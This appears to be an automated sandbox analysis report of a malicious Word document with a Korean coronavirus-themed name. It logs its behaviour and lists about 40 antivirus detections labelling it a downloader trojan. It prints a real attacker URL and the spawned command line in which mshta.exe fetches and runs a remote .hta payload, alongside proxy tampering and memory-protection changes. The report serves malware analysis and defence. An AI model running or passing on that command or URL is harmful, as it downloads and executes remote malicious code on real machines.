코로나바이러스 대응.doc

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 8, 2021, 1:27 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c9b1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ca05000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732d1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c981000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c8d1000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 8, 2021, 1:27 p.m.	process_identifier: 1892 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72472000 process_handle: 0xffffffff	1	0	0

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 8, 2021, 1:27 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000003ec filepath: C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$나바이러스 대응.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\mshta.exe" http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 8, 2021, 1:27 p.m.	key_handle: 0x000002d0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Creates suspicious VBA object (1 event)

com_class

WScript.Shell

May attempt to create new processes

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

"C:\Windows\System32\mshta.exe" http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f

File has been identified by 40 AntiVirus engines on VirusTotal as malicious (40 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.33572223
FireEye	Trojan.GenericKD.33572223
CAT-QuickHeal	O97M.Downloader.36951
McAfee	RDN/Generic Downloader.x
Sangfor	Malware.Generic-Macro.Save.7f97160f
Alibaba	TrojanDownloader:VBA/Obfuscation.A
Arcabit	HEUR.VBA.CG.1
Cyren	PP97M/Downldr.gen
Symantec	W97M.Downloader
Avast	Other:Malware-gen [Trj]
ClamAV	Doc.Dropper.Agent-7601883-0
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	Trojan.GenericKD.33572223
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
AegisLab	Trojan.Script.Generic.a!c
Tencent	Heur:Trojan.Script.LS_Gencirc.7162455.0
Ad-Aware	Trojan.GenericKD.33572223
Sophos	Troj/DocDl-XPS
Comodo	Malware@#1oi6zkr5uwftx
TrendMicro	HEUR_VBA.O2
McAfee-GW-Edition	BehavesLike.Downloader.mc
Emsisoft	Trojan.GenericKD.33572223 (B)
SentinelOne	Static AI - Malicious OPENXML
MAX	malware (ai score=100)
Antiy-AVL	Trojan[Downloader]/Script.AGeneric
Microsoft	TrojanDownloader:O97M/Obfuse!MTB
ViRobot	W97M.S.Downloader.83081
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
GData	Trojan.GenericKD.33572223
AhnLab-V3	Downloader/Doc.Generic
ALYac	Trojan.Downloader.DOC.Gen
TACHYON	Suspicious/WOX.Obfus.Gen.8
Zoner	Probably Heur.W97Obfuscated
ESET-NOD32	VBA/TrojanDownloader.Agent.RVA
Rising	Downloader.Obfuse!8.105AD (TOPIS:E0:FjHecNdIxsO)
Ikarus	Trojan-Downloader.O97M.Obfuse
Fortinet	W32/Agent.RVA!tr
AVG	Other:Malware-gen [Trj]
Qihoo-360	virus.office.obfuscated.1

The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\mshta.exe